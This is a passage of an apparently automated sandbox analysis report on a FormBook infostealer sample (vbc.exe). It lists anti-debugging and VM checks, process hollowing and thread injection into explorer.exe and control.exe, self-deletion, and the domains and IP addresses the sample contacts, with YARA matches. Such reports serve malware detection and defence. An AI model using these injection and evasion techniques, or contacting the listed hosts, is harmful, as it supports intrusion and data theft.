Source: vbc.exe, 00000004.00000002.2148950526.0000000000584000.00000004.00000020.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: explorer.exe, 00000006.00000000.2152068739.0000000000231000.00000004.00000020.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}

Queries a list of all running processes

Source: C:\Users\Public\vbc.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Checks if the current process is being debugged

Source: C:\Users\Public\vbc.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Process queried: DebugPort			Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\Public\vbc.exe

Code function: 5_2_004088C0 rdtsc

5_2_004088C0

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Users\Public\vbc.exe

Code function: 5_2_00409B30 LdrLoadDll,

5_2_00409B30

Contains functionality to dynamically determine API calls

Source: C:\Users\Public\vbc.exe

Code function: 4_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,

4_2_00405E88

Contains functionality to read the PEB

Source: C:\Users\Public\vbc.exe	Code function: 5_2_009826F8 mov eax, dword ptr fs:[00000030h]		5_2_009826F8
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_020726F8 mov eax, dword ptr fs:[00000030h]		7_2_020726F8

Enables debug privileges

Source: C:\Users\Public\vbc.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Process token adjusted: Debug			Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Domain query: www.meganfantastic.com
Source: C:\Windows\explorer.exe	Domain query: www.adultvideolife.xyz
Source: C:\Windows\explorer.exe	Domain query: www.sciencebasedmasks.com
Source: C:\Windows\explorer.exe	Network Connect: 45.195.169.197 80			Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.alberthospice.com
Source: C:\Windows\explorer.exe	Network Connect: 154.84.76.49 80			Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Users\Public\vbc.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write			Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write			Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\Public\vbc.exe	Thread register set: target process: 1388			Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Thread register set: target process: 1388			Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Users\Public\vbc.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Source: C:\Users\Public\vbc.exe

Section unmapped: C:\Windows\SysWOW64\control.exe base address: C20000

Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'			Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'			Jump to behavior

May try to detect the Windows Explorer process (often used for injection)

Source: explorer.exe, 00000006.00000000.2171619631.00000000006F0000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000006.00000000.2171619631.00000000006F0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000000.2151792778.00000000001F5000.00000004.00000020.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000006.00000000.2171619631.00000000006F0000.00000002.00000001.sdmp	Binary or memory string: !Progman

Language, Device and Operating System Detection:

Contains functionality to query windows version

Source: C:\Users\Public\vbc.exe

Code function: 4_2_00405B88 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,

4_2_00405B88

Stealing of Sensitive Information:

Yara detected FormBook

Source: Yara match	File source: 00000004.00000002.2148551339.0000000000510000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2184605345.0000000000530000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2355390594.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2184564654.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000001.2143287241.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2184493776.0000000000270000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2355480146.0000000000170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2355508020.00000000001A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 4.2.vbc.exe.510000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.510000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook

Source: Yara match	File source: 00000004.00000002.2148551339.0000000000510000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2184605345.0000000000530000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2355390594.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2184564654.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000001.2143287241.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2184493776.0000000000270000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2355480146.0000000000170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2355508020.00000000001A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 4.2.vbc.exe.510000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.510000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE